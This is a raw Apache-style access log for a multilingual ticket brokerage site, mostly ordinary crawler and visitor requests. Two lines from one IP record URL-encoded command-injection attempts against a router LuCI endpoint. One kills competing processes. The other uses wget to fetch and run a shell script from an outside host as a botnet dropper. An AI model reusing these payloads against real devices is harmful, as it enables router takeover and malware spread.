217.113.194.220 - - [19/Jul/2024:04:16:32 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=36394212-F82E-F845-399B-42BED55969CC&eventid=8089A138-5EE7-E43F-C342-AAB9352CA1D1 HTTP/1.1" 200 83395
66.249.79.233 - - [19/Jul/2024:04:16:35 +0200] "GET /ticket2/opencms/no/buy?page=1&edid=F75A8704-39CC-1233-9E9B-2121B4DFC51E HTTP/1.1" 200 114070
154.54.249.216 - - [19/Jul/2024:04:16:41 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A3372871-3019-08B8-80CE-74B78F441ACA&eventid=8899E7D7-7225-ED54-36BF-39DC3F37E3EF HTTP/1.1" 200 82749
217.113.194.217 - - [19/Jul/2024:04:16:49 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&eventid=265F6746-CFC4-3148-B232-5753484890DA HTTP/1.1" 200 82149
217.113.194.218 - - [19/Jul/2024:04:16:57 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=57BE8363-4DC6-4A02-534F-EA7CD045F0C5 HTTP/1.1" 200 84480
37.60.249.191 - - [19/Jul/2024:04:17:03 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=BB1EC027-667A-D516-1408-190AC626767E&sortorder=asc&column=price HTTP/1.1" 404 -
217.113.194.220 - - [19/Jul/2024:04:17:06 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=98E4EE5B-2FEF-B0A7-2AB8-16B16B7EEE99 HTTP/1.1" 200 85305
47.128.60.77 - - [19/Jul/2024:04:17:08 +0200] "GET /ticket2/opencms/de/buy/?edid=D3BB5206-D09C-E9EC-0247-A3E56EA24028 HTTP/1.1" 200 71949
47.128.60.77 - - [19/Jul/2024:04:17:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.60.77 - - [19/Jul/2024:04:17:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.145.239 - - [19/Jul/2024:04:17:14 +0200] "GET /ticket2/opencms/en/sell/?edid=8528F9BE-E74F-7018-BEA6-8631CBF08136 HTTP/1.1" 302 -
217.113.194.220 - - [19/Jul/2024:04:17:15 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=F9320545-FD47-A95D-06BA-F85BAE909BD3 HTTP/1.1" 200 85305
114.119.145.239 - - [19/Jul/2024:04:17:19 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
217.113.194.215 - - [19/Jul/2024:04:17:23 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=346607B5-E4A9-F9AC-6AB5-901899456D19 HTTP/1.1" 200 82380
216.244.66.238 - - [19/Jul/2024:04:17:24 +0200] "GET /ticket2/opencms/se/en/sell/?edid=1CEB7967-C20C-A921-EEEC-CF529EC1E8C1 HTTP/1.1" 404 -
37.60.249.191 - - [19/Jul/2024:04:17:30 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=C2CD3885-D663-89B2-61C9-751DA9A6EAB2&sortorder=asc&column=price HTTP/1.1" 404 -
66.249.79.171 - - [19/Jul/2024:04:17:31 +0200] "GET /ticket2/opencms/fi/venue/?venueid=196FB588-3DD3-A39A-5871-20BDD46513E4 HTTP/1.1" 200 72268
217.113.194.213 - - [19/Jul/2024:04:17:32 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=A653911E-9D8A-A015-97DB-CF8AF0159DA3 HTTP/1.1" 200 84689
217.113.194.214 - - [19/Jul/2024:04:17:41 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=CF1981BE-D0AD-DC7E-0BC6-4A062B691166 HTTP/1.1" 200 104396
63.143.42.252 - - [19/Jul/2024:04:17:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
63.143.42.252 - - [19/Jul/2024:04:17:45 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
217.113.194.219 - - [19/Jul/2024:04:17:50 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=A653911E-9D8A-A015-97DB-CF8AF0159DA3 HTTP/1.1" 200 85714
114.119.140.175 - - [19/Jul/2024:04:17:51 +0200] "GET /ticket2/opencms/en/venue/?venueid=4E57517D-EB34-B5C4-C05B-4A4E6641D62F HTTP/1.1" 200 70718
37.60.249.191 - - [19/Jul/2024:04:17:52 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=C2CD3885-D663-89B2-61C9-751DA9A6EAB2&sortorder=asc&column=row HTTP/1.1" 404 -
40.77.167.1 - - [19/Jul/2024:04:17:55 +0200] "GET /ticket2/opencms/nl/buy/?page=1&edid=8A15C340-B6C2-2F43-473C-6069B2AC1544 HTTP/1.1" 200 108902
217.113.194.217 - - [19/Jul/2024:04:17:58 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=F9320545-FD47-A95D-06BA-F85BAE909BD3 HTTP/1.1" 200 85714
216.244.66.238 - - [19/Jul/2024:04:18:07 +0200] "GET /ticket2/opencms/dk/sv/venue/?venueid=3EFA133C-9DC2-28D1-976C-FF89420A85DD HTTP/1.1" 404 -
154.54.249.216 - - [19/Jul/2024:04:18:07 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=35A0C9BF-EC06-DE5F-22DE-E131A0832C91 HTTP/1.1" 200 105183
190.92.205.11 - - [19/Jul/2024:04:18:08 +0200] "GET /ticket2/opencms/sv/tickets/aston_villa/ HTTP/1.1" 200 84180
37.60.249.191 - - [19/Jul/2024:04:18:09 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=C2CD3885-D663-89B2-61C9-751DA9A6EAB2&sortorder=asc&column=section HTTP/1.1" 404 -
216.244.66.238 - - [19/Jul/2024:04:18:13 +0200] "GET /ticket2/opencms/se/en/venue/?countryid=5EEFCF47-AD38-F951-EE2B-C85C4E24342F HTTP/1.1" 404 -
217.113.194.212 - - [19/Jul/2024:04:18:15 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=9608B88D-4751-0A24-32DD-71608FAA71C6 HTTP/1.1" 200 82161
217.113.194.215 - - [19/Jul/2024:04:18:24 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=BC561376-B4E8-33D4-7E7F-03D25A501B64 HTTP/1.1" 200 84480
114.119.133.35 - - [19/Jul/2024:04:18:30 +0200] "GET /ticket2/opencms/en/venue/?countryid=05A16A09-0467-80D8-0CB3-39181A7D930C HTTP/1.1" 200 100101
217.113.194.221 - - [19/Jul/2024:04:18:33 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=F9320545-FD47-A95D-06BA-F85BAE909BD3 HTTP/1.1" 200 84480
37.60.249.191 - - [19/Jul/2024:04:18:35 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=C2CD3885-D663-89B2-61C9-751DA9A6EAB2&sortorder=desc&column=price HTTP/1.1" 404 -
217.113.194.218 - - [19/Jul/2024:04:18:42 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=3735944E-9E44-5BAC-9AF2-064E86E3A131 HTTP/1.1" 200 103207
217.113.194.220 - - [19/Jul/2024:04:18:50 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=B194C4C7-6A55-0CA8-6BBF-3B35922D1A6B HTTP/1.1" 200 83908
45.148.10.202 - - [19/Jul/2024:04:18:52 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560for+proc_dir+in+%252Fproc%252F%255B0-9%255D%252A%253B+do+pid%253D%2524%257Bproc_dir%2523%2523%252A%252F%257D%253B+buffer%253D%2524%2528cat+%2522%252Fproc%252F%2524pid%252Fmaps%2522%2529%253B+if+%255B+%2522%2524%257B%2523buffer%257D%2522+-gt+1+%255D%253B+then+if+%255B+%2522%2524%257Bbuffer%2523%252A%2522%252Flib%252F%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D+%2526%2526+%255B+%2522%2524%257Bbuffer%2523%252A%2522telnetdbot%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D%253B+then+kill+-9+%2522%2524pid%2522%253B+fi%253B+fi%253B+done%2560) HTTP/1.1" 404 -
45.148.10.202 - - [19/Jul/2024:04:18:52 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560cd+%252Ftmp%253B+rm+-rf+wget.sh%253B+wget+http%253A%252F%252F87.121.112.42%252Fwget.sh%253B+chmod+777+wget.sh%253B+.%252Fwget.sh+tplink%253B+rm+-rf+wget.sh%2560) HTTP/1.1" 404 -
136.243.222.140 - - [19/Jul/2024:04:18:58 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=FDC70D4B-A88B-5334-5A88-AC1F94FAEBF8 HTTP/1.1" 200 109333
217.113.194.217 - - [19/Jul/2024:04:18:59 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=B194C4C7-6A55-0CA8-6BBF-3B35922D1A6B HTTP/1.1" 200 85305
217.113.194.221 - - [19/Jul/2024:04:19:07 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=18B8DA5D-B558-D3C3-D79D-F2764A2E5EB8 HTTP/1.1" 200 82986
154.54.249.216 - - [19/Jul/2024:04:19:15 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=18B8DA5D-B558-D3C3-D79D-F2764A2E5EB8 HTTP/1.1" 200 82380
37.60.249.191 - - [19/Jul/2024:04:19:22 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=C2CD3885-D663-89B2-61C9-751DA9A6EAB2&sortorder=desc&column=row HTTP/1.1" 404 -
217.113.194.219 - - [19/Jul/2024:04:19:24 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=50360403-991B-F883-97BB-AFA49C266DF7 HTTP/1.1" 200 82380
66.249.79.171 - - [19/Jul/2024:04:19:24 +0200] "GET /ticket2/opencms/es/buy?page=1&edid=E9DB3A42-82BF-9B65-3ED4-EE5A32871388 HTTP/1.1" 200 108279
47.128.118.141 - - [19/Jul/2024:04:19:25 +0200] "GET /ticket2/opencms/dk/buy/?edid=C38C9EAF-E0B0-6534-4013-4D91325C6AD1 HTTP/1.1" 200 71437
47.128.118.141 - - [19/Jul/2024:04:19:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.118.141 - - [19/Jul/2024:04:19:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.123.143.245 - - [19/Jul/2024:04:19:28 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:04:19:28 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
217.113.194.216 - - [19/Jul/2024:04:19:32 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=B194C4C7-6A55-0CA8-6BBF-3B35922D1A6B HTTP/1.1" 200 84689
216.244.66.238 - - [19/Jul/2024:04:19:33 +0200] "GET /ticket2/opencms/se/dk/sport/fodboldbilletter/la-liga/eibar/ HTTP/1.1" 404 -
217.113.194.213 - - [19/Jul/2024:04:19:41 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=98E4EE5B-2FEF-B0A7-2AB8-16B16B7EEE99 HTTP/1.1" 200 84689
154.54.249.216 - - [19/Jul/2024:04:19:49 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=6649D754-FC9A-DD56-57CA-2EE91B2B3185 HTTP/1.1" 200 83391
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/tottenham/?gad_source=1&gbraid=0AAAAADlS-t_fFh-JqRmsQpfBhNFd5JyrY&gclid=Cj0KCQjw-uK0BhC0ARIsANQtgGONmUY7dJhUMNKppB-xCwqO3LtdWLbyzXqNOhcT1nZk_MvgzJ2d8fMaAoafEALw_wcB HTTP/1.1" 200 85252
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 72814
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
87.49.146.181 - - [19/Jul/2024:04:19:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/Tottenham.jpg HTTP/1.1" 200 13797
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
87.49.146.181 - - [19/Jul/2024:04:19:55 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
87.49.146.181 - - [19/Jul/2024:04:19:57 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
87.49.146.181 - - [19/Jul/2024:04:19:58 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
87.49.146.181 - - [19/Jul/2024:04:19:59 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
87.49.146.181 - - [19/Jul/2024:04:19:59 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
87.49.146.181 - - [19/Jul/2024:04:19:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
154.54.249.216 - - [19/Jul/2024:04:19:59 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1&eventid=98E4EE5B-2FEF-B0A7-2AB8-16B16B7EEE99 HTTP/1.1" 200 85714
87.49.146.181 - - [19/Jul/2024:04:20:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
37.60.249.191 - - [19/Jul/2024:04:20:00 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=C58C4D82-5A12-E919-06D9-9707EA405EF9&sortorder=desc&column=row HTTP/1.1" 404 -
217.113.194.212 - - [19/Jul/2024:04:20:07 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=346607B5-E4A9-F9AC-6AB5-901899456D19 HTTP/1.1" 200 82161
87.49.146.181 - - [19/Jul/2024:04:20:13 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=36B8587B-9BD4-1599-9368-E59F9780F9A9 HTTP/1.1" 200 120249
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 72814
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/venue/Tottanham_Hotspur_Stadium.png HTTP/1.1" 200 43726
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/0.gif HTTP/1.1" 200 43
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/dk/ask-form.html HTTP/1.1" 200 2971
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/form_marker.gif HTTP/1.1" 200 43
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/arrow.gif HTTP/1.1" 200 344
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_left.gif HTTP/1.1" 200 232
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_center.gif HTTP/1.1" 200 66
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_right.gif HTTP/1.1" 200 232
87.49.146.181 - - [19/Jul/2024:04:20:14 +0200] "GET /ticket2/opencms/img/arrow-down.png HTTP/1.1" 200 192
217.113.194.213 - - [19/Jul/2024:04:20:16 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A3372871-3019-08B8-80CE-74B78F441ACA&eventid=DFDFE3CE-4FC8-F7B9-D656-A64359A3D356 HTTP/1.1" 200 82963
66.249.76.170 - - [19/Jul/2024:04:20:23 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=2E02071B-A8C3-4CBA-3097-C27D61C02ED8&url=/dk/buy/index.html%3Fpage%3D1%26edid%3DBA0F8DEE-5B47-CEE4-147B-0950F10B9786%26hlv%3D666d6ea0-525c-4421-b43d-0c140a01000f%23v918337531 HTTP/1.1" 200 224
217.113.194.220 - - [19/Jul/2024:04:20:24 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=EC400621-1050-8895-DCE5-36CFFF18A035 HTTP/1.1" 200 98914
66.249.76.160 - - [19/Jul/2024:04:20:30 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=BA0F8DEE-5B47-CEE4-147B-0950F10B9786&hlv=666d6ea0-525c-4421-b43d-0c140a01000f HTTP/1.1" 200 111033
217.113.194.214 - - [19/Jul/2024:04:20:32 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=60DD1888-A212-4A9C-E256-57FE4F2AC5DC HTTP/1.1" 200 82986
3.69.27.119 - - [19/Jul/2024:04:20:39 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 94039
37.60.249.191 - - [19/Jul/2024:04:20:41 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=C58C4D82-5A12-E919-06D9-9707EA405EF9&sortorder=desc&column=section HTTP/1.1" 404 -
217.113.194.218 - - [19/Jul/2024:04:20:49 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A3372871-3019-08B8-80CE-74B78F441ACA&eventid=DFDFE3CE-4FC8-F7B9-D656-A64359A3D356 HTTP/1.1" 200 83751
136.243.222.140 - - [19/Jul/2024:04:20:53 +0200] "GET /ticket2/opencms/en/buying_tickets HTTP/1.1" 200 72532
217.113.194.213 - - [19/Jul/2024:04:20:57 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=60DD1888-A212-4A9C-E256-57FE4F2AC5DC HTTP/1.1" 200 83391
217.113.194.213 - - [19/Jul/2024:04:21:06 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A3372871-3019-08B8-80CE-74B78F441ACA&eventid=DFDFE3CE-4FC8-F7B9-D656-A64359A3D356 HTTP/1.1" 200 84775
37.60.249.191 - - [19/Jul/2024:04:21:12 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=CBA42126-03F9-1816-351E-98C8E738FAF8&sortorder=asc&column=price HTTP/1.1" 404 -
